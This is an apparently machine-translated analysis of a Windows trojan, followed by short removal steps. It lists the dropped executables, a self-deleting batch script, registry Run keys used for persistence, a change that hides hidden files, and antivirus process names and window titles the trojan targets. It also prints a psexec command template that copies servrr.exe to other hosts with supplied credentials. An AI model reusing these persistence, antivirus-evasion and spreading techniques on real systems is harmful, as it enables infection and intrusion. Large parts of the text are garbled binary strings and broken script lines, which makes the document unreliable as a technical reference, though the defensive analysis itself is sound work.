Release
C:\setup.exe
size:28,672 bytes
C:\Documents and Settings\user\Local Settings\temp\rs.bat
size:105 bytes
%windir%\system32\microsoft.exe
size:28,672 bytes
%windir%\system32\sp00lv.exe
size:28,672 bytes
%windir%\system32\drivers\svchost.exe
size:28,672 bytes
D:\Setup.exe
size:28,672 bytes
E:\setup.exe
size:28,672 bytes
F:\setup.exe
size:28,672 bytes
where Rs.bat content
@echo off
: Start
If not exist "'%1 '" goto done
Del/f ""%1 ""
Del ""%1 ""
Goto Start
:d One
del/f%t
Registry Add hkey_local_machine\system\controlset002\services\winnet COM +
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Internat"
Type:reg_sz
Data:c:\windows\system32\microsoft.exe Aeolosma | 癓 搢? 爧 笒 綴 Weak 荎 搢 How (S-5-(? 7 2 搢? 7 7? D? Aeolosma |? T? 8 搢 搢 搢 搢 搢 蛈 | WK 苪 x 鴐 苪 捳 抾
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Program Files"
Type:reg_sz
Data:c:\windows\system32\sp00lv.exe 7 2 搢 7 7 旜? Kang Aeolosma |? 桫 8 搢 搢 0? @ 7 T e M 3 2 \ d r x 7 E R s \ s v o s t. E x e @? p97 2 搢? 7 7? Aeolosma |? L? X 7 搢 H97 0? 袐 x 7 @ 7 x97 @
Modify Hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall " CheckedValue "
Old Data:01, 00, 00, 00 modified so that the system does not show hidden files
New data:00, 00, 00, 00
hkey_local_machine\system\currentcontrolset\control\deviceclasses\{6994ad04-93ef-11d0-a3cc-00a0c9223196}\##?# pci#ven_8086&dev_24c5&subsys_4720414c&rev_02#3&13c0b0c5&0&fd#{ 6994ad04-93ef-11d0-a3cc-00a0c9223196}\ #Wave \device Parameters\mixer\0\ Mute the system
Close a window with the following characters
Security guards
Scanning
Specially killed
Registration Form
Process
Process
Poison
Trojan
Defense
Firewall
Virus
Detection
Firewall
Virus
Anti
Jinshan
Jiangmin
Kaspersky
Worm
360
Micro Point
Micropoint
Nemesis
Advertising
Avk
Kaspersky
F-secure
Escan
Norton
Norton
Mcafee
Virus
Panda
Panda
Trojan
Door
Avg
360tray.exe
Ravtask.exe
Ravstub.exe
Ravmond.exe
Ravmon.exe
Ccenter.exe
Rfwstub.exe
Rfwproxy.exe
Rfwsrv.exe
Rfwain.exe
Ras.exe
Runiep
Reverse assemble. Discovery:%s\psexec.exe \\%s-u%s-p%s-c%s\servrr.exe-
and use http://tools.hxstat.com/ip/to get the IP address.
Solve:
Use Sreng in addition to startup items []
[]
Delete Service [winnet COM +/winnet com+][stopped/auto Start]
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.